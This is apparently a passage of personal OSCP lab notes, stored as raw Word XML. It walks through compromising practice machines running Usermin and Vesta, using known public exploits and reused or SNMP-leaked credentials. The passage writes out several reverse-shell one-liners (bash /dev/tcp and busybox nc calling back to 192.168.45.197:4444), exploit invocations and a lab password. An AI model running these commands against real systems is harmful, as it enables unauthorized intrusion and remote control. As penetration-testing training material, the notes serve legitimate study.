        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1087"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Could have also added the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for quicker find</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000390B">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This one was for FTP. The users.txt was Cassie, cassie, Mark, mark, Robert, and robert</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000390C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1087"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is important since we saw Cassie on the exiftool but the username was actually cassie (lowercase)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000390D">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And then re try credentials on website since cassie:cassie gave you local.txt so it's likely her actual account password so it will likely work on website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000390E">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And it worked for both FTP and the usermin portal!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000390F">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In FTP was local.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003910">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Further enumerating usermin page, we see that we have 2 ways of getting rev shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003911">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First, we can use the usermin 1.820 exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003912">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1087"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1250">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50234</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003913">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108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searchsploit -m 50234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003914">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Then, you inspect the code and see that you need to edit the lines to add your own IP and port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003915">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1087"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listen_ip = "192.168.45.197"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003916">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1087"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listen_port = 443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003917">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3918">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108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nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003919">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I then ran it but I got an error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000391A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108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50234.py -u 192.168.239.157 -l cassie -p cassie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000391B">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The error was:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IndexError: list index out of range</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000391C">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It turns out, we were supposed to use the hostname and not the IP. This makes sense, since even though we added it to /etc/hosts, we should always use the hostname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000391D">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So I ran it again, and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000391E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108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50234.py -u oscp -l cassie -p cassie</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000391F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way to get RCE was using the command execution that was included in usermin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003920">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108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2489200" cy="3987800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="219" name="image218.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image218.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1251"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2489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3921">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Go to "Login" and then "Command Shell"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003922">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108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879600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="267" name="image257.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image257.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId125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3923">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You can then type in any command you want</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003924">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I tried connecting using nc only, but it didn't work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003925">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Then I tried the Bash 5 shell and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003926">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="108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-i 5&lt;&gt; /dev/tcp/192.168.45.197/4444 0&lt;&amp;5 1&gt;&amp;5 2&gt;&amp;5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003927">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1087"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I also tried seeing if busybox was installed, and it was, so I used busybox nc and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003928">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="108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busybox nc 192.168.45.197 4444 -e sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003929">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000392A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000392B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9npadngqzmek" w:id="535"/>
      <w:bookmarkEnd w:id="535"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vesta </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000392C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000392D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-C .156 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which got us</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> root shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and skipped initial foothold! We just had to use credentials for Vesta.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Port 8083.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000392E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000392F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we got valid credentials through SNMP, which were </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jack:3PUKsX98BMupBiCf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we could login to Vesta. Vesta portal was on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003930">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003931">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On </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port 8083</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, there was a portal. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was a Vesta port. I tried the credentials and it worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003932">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jack : 3PUKsX98BMupBiCf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003933">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Then, I tried looking around, but nothing useful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003934">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So then I searched up "Vesta exploits github" on google and found this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003935">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1253">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/CSpanias/vesta-rce-exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003936">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I then tried it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003937">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vesta.py</w:t>
      </w:r>
      <w:hyperlink r:id="rId1254">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="fa0000"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1255">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://192.168.239.156:8083</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> jack 3PUKsX98BMupBiCf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003938">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make sure it's https and not http</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003939">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And I got a shell!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> And it was root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000393A">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BUTTTTT, it was a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">per‑command executor (a.k.a per-command wrapper),</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> meaning that none of the previous commands affect the future. Like if you try "cd ..", then it won't actually change your directory. You always go back to where you start.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000393B">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Each line you type is run in its own fresh process that starts in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/vesta/web/api/v1/edit/mail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000393C">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Builtins like cd only affect that one short‑lived process, so your cwd “snaps back” on the next line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000393D">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Absolute paths (e.g., /home/jack/local.txt, /root/proof.txt) still work, so you can read any file you have permission for.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000393E">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I tried uprgrading the shell using VIM and python, but nothing worked! But, I finally found out how to get a shell. Just send a rev shell to another listener!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000393F">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You can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash -i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from revshells.com. Bash5 from revshells.com also works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003940">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="141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-i &gt;&amp; /dev/tcp/192.168.45.197/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003941">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="141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-i 5&lt;&gt; /dev/tcp/192.168.45.197/4444 0&lt;&amp;5 1&gt;&amp;5 2&gt;&amp;5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003942">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or you can use busybox if it's there (which it was for me)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003943">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="141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busybox nc 192.168.45.197 4444 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003944">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003945">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ORRRR, you can just use "cat" and read local.txt and proof.txt. I could tell local.txt was in /home/jack/local.txt since FTP directory looked like /home/jack and it had a local.txt that I couldn't read. But, you can also use find command to find local.txt and root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003946">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find / -name local.txt 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
